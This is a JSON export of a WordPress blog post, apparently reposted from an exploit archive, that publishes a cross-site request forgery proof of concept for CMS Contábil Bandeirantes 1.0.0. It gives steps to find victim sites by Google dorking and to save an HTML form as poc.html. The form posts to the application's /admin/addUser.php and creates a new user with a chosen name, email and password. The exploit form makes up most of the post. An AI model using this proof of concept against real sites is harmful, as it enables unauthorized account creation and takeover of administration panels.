{"id":45416,"date":"2023-07-21T21:18:50","date_gmt":"2023-07-21T17:18:50","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173677\/cmscb100-xsrf.txt"},"modified":"2023-07-22T10:42:35","modified_gmt":"2023-07-22T06:12:35","slug":"cms-contabil-bandeirantes-1-0-0-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cms-contabil-bandeirantes-1-0-0-cross-site-request-forgery\/","title":{"rendered":"CMS Contabil Bandeirantes 1.0.0 Cross Site Request Forgery"},"content":{"rendered":"<p>======================================================================================================================================<br \/>\n| # Title : CMSCont\u00e1bil Bandeirantes V 1.0.0 CSRF Vulnerability |<br \/>\n| # Author : indoushka |<br \/>\n| # Tested on : windows 10 Fran\u00e7ais V.(Pro) \/ browser : Mozilla firefox 61.0.1 (32-bit) |<br \/>\n| # Vendor : https:\/\/scriptmafia.org\/ |<br \/>\n======================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine .<\/p>\n[+] Go to the line 12.<\/p>\n[+] Set the target site link Save changes and apply .<\/p>\n[+] infected file : \/admin\/addUser.php<\/p>\n[+] Save code as poc.html<\/p>\n<p>&lt;section id=&#8221;main&#8221; class=&#8221;column&#8221; style=&#8221;height: 680px;&#8221;&gt;<\/p>\n<p>&lt;h4 class=&#8221;alert_info&#8221;&gt;Necess\u00e1rio preencher todos os campos.&lt;\/h4&gt;<br \/>\n&lt;!&#8211;&lt;h4 class=&#8221;alert_warning&#8221;&gt;A Warning Alert&lt;\/h4&gt;<\/p>\n<p>&lt;h4 class=&#8221;alert_error&#8221;&gt;An Error Message&lt;\/h4&gt;<\/p>\n<p>&lt;h4 class=&#8221;alert_success&#8221;&gt;A Success Message&lt;\/h4&gt;&#8211;&gt;<\/p>\n<p>&lt;article class=&#8221;module width_full&#8221;&gt;<br \/>\n&lt;form action=&#8221;http:\/\/127.0.0.1\/cbandeirantescombr\/admin\/addUser.php&#8221; method=&#8221;post&#8221; enctype=&#8221;multipart\/form-data&#8221; name=&#8221;cadastroUser&#8221;&gt;<br \/>\n&lt;header&gt;&lt;h3&gt;Adicionar Usu\u00e1rios&lt;\/h3&gt;&lt;\/header&gt;<\/p>\n<p>&lt;div class=&#8221;module_content&#8221;&gt;<br \/>\n&lt;fieldset&gt;<br \/>\n&lt;label&gt;Nome&lt;\/label&gt;<br \/>\n&lt;input name=&#8221;nome&#8221; id=&#8221;nome&#8221; value=&#8221;&#8221; type=&#8221;text&#8221;&gt;<br \/>\n&lt;\/fieldset&gt;<br \/>\n&lt;fieldset&gt;<br \/>\n&lt;label&gt;Email&lt;\/label&gt;<br \/>\n&lt;input name=&#8221;email&#8221; id=&#8221;email&#8221; value=&#8221;&#8221; type=&#8221;text&#8221;&gt;<br \/>\n&lt;\/fieldset&gt;<br \/>\n&lt;fieldset&gt;<br \/>\n&lt;label&gt;Senha&lt;\/label&gt;<br \/>\n&lt;input name=&#8221;senha&#8221; id=&#8221;senha&#8221; value=&#8221;&#8221; type=&#8221;text&#8221;&gt;<br \/>\n&lt;\/fieldset&gt;<br \/>\n&lt;div class=&#8221;clear&#8221;&gt;&lt;\/div&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;footer&gt;<br \/>\n&lt;div class=&#8221;submit_link&#8221;&gt;<br \/>\n&lt;input id=&#8221;limpar&#8221; name=&#8221;limpar&#8221; value=&#8221;limpar&#8221; type=&#8221;submit&#8221;&gt;<br \/>\n&lt;input name=&#8221;cadastrar&#8221; value=&#8221;Cadastrar&#8221; class=&#8221;alt_btn&#8221; type=&#8221;submit&#8221;&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/footer&gt;<br \/>\n&lt;\/form&gt;<br \/>\n&lt;\/article&gt;&lt;!&#8211; end of post new article &#8211;&gt;<\/p>\n<p>&lt;div class=&#8221;spacer&#8221;&gt;&lt;\/div&gt;<br \/>\n&lt;\/section&gt;<\/p>\n<p>Greetings to :=========================================================================================================================<br \/>\njericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br \/>\n=======================================================================================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>====================================================================================================================================== | # Title : CMSCont\u00e1bil Bandeirantes V 1.0.0 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fran\u00e7ais V.(Pro) \/ browser : Mozilla firefox 61.0.1 (32-bit) | | # Vendor : https:\/\/scriptmafia.org\/ | ====================================================================================================================================== poc : [+] Dorking \u0130n Google Or Other Search Enggine . [+] Go &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45416","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45416","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45416"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45416\/revisions"}],"predecessor-version":[{"id":45428,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45416\/revisions\/45428"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45416"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45416"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45416"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}